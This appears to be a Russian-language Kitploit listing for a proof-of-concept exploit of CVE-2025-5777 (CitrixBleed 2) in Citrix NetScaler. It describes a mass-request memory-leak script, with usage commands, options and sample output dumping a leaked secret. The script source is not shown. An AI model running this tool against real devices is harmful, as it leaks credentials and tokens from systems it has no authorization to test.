Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-5777 — Citrix NetScaler Утечка памяти PoC | Kitploit
Инструменты/GitHubGitHub/0xgh057r3c0n/cve-2025-5777
Анализ уязвимостейЭксплуатацияСбор информацииВеб-безопасностьТестирование на ПроникновениеRed Teaming
GitHub0xgh057r3c0n/cve-2025-5777

CVE-2025-5777

Citrix NetScaler Утечка памяти PoC

Репозиторий
2411 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-5777 - PoC утечки памяти Citrix NetScaler

📌 Описание

Этот скрипт эксплуатирует критическую уязвимость раскрытия памяти в устройствах Citrix NetScaler ADC/Gateway, известную как CVE-2025-5777 (также называемую CitrixBleed 2). Он вызывает утечку памяти через конечную точку /p/u/doAuthentication.do, раскрывая неинициализированную память, содержащую конфиденциальные данные, такие как XML-фрагменты, токены и потенциально учетные данные.

  • 📅 ID CVE: CVE-2025-5777
  • ⚙️ Воздействие: Раскрытие информации
  • 🧑‍💻 Автор: [0xgh057r3c0n]
  • 🧵 Параллельность: Асинхронный с aiohttp
  • 📦 Зависимости: aiohttp, colorama

🚀 Возможности

  • Асинхронный движок массовых запросов с использованием asyncio + aiohttp
  • Шестнадцатеричный дамп фрагментов утечки памяти
  • Автоматическое обнаружение утечки памяти <InitialValue>
  • Подробный режим для отладки и предварительного просмотра ответов
  • Корректная обработка прерывания (Ctrl+C)

  • 🧪 Использование

    root@kitploit:~
    python3 CVE-2025-5777.py http://<target> [options]
    

    🔧 Параметры

    OptionОписание
    -v, --verboseВключить подробный вывод отладки
    -p <proxy>Использовать HTTP прокси (например, http://127.0.0.1:8080)
    -t <threads>Количество параллельных запросов (по умолчанию: 10)

    📥 Пример

    root@kitploit:~
    python3 CVE-2025-5777.py http://192.168.1.1 -v -t 5
    

    📤 Пример вывода

    root@kitploit:~
    _____________   _______________         _______________   ________   .________          .___________________________________ 
    \_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \  |   ____/          |   ____/\______  \______  \______  \
    /    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/  |____  \   ______  |____  \     /    /   /    /   /    /
    \     \____\     /   |        \ /_____/ /       \  \_/   \/       \  /       \ /_____/  /       \   /    /   /    /   /    / 
     \______  / \___/   /_______  /         \_______ \_____  /\_______ \/______  /         /______  /  /____/   /____/   /____/  
            \/                  \/                  \/     \/         \/       \/                 \/                             
    
             PoC утечки памяти Citrix NetScaler (CVE-2025-5777)
                         Автор: 0xgh057r3c0n
    
    [🔄] POST → http://192.168.1.1/p/u/doAuthentication.do → Статус: 200
    [✔️ ] Обнаружена утечка памяти InitialValue!
    [🧠] Шестнадцатеричный дамп:
    ------------------------------------------------------------------------
    00000000: 73 65 63 72 65 74 3d 22 61 62 63 64 31 32 33 21   secret="abcd123!
    00000010: 40 23 24 25 5e 26 2a 28 29 22 3c 2f 49 6e 69 74   @#$%^&*()"</Init
    00000020: 69 61 6c 56 61 6c 75 65 3e                        ialValue>
    ------------------------------------------------------------------------
    
    [✔️ ] Утечка подтверждена. Продолжаем извлечение...
    

    ⚠️ Отказ от ответственности

    Эта концепция доказательства предназначена только для образовательного и авторизованного тестирования безопасности. Несанкционированное сканирование или эксплуатация систем, которые вам не принадлежат, является незаконным.

    Скачать инструмент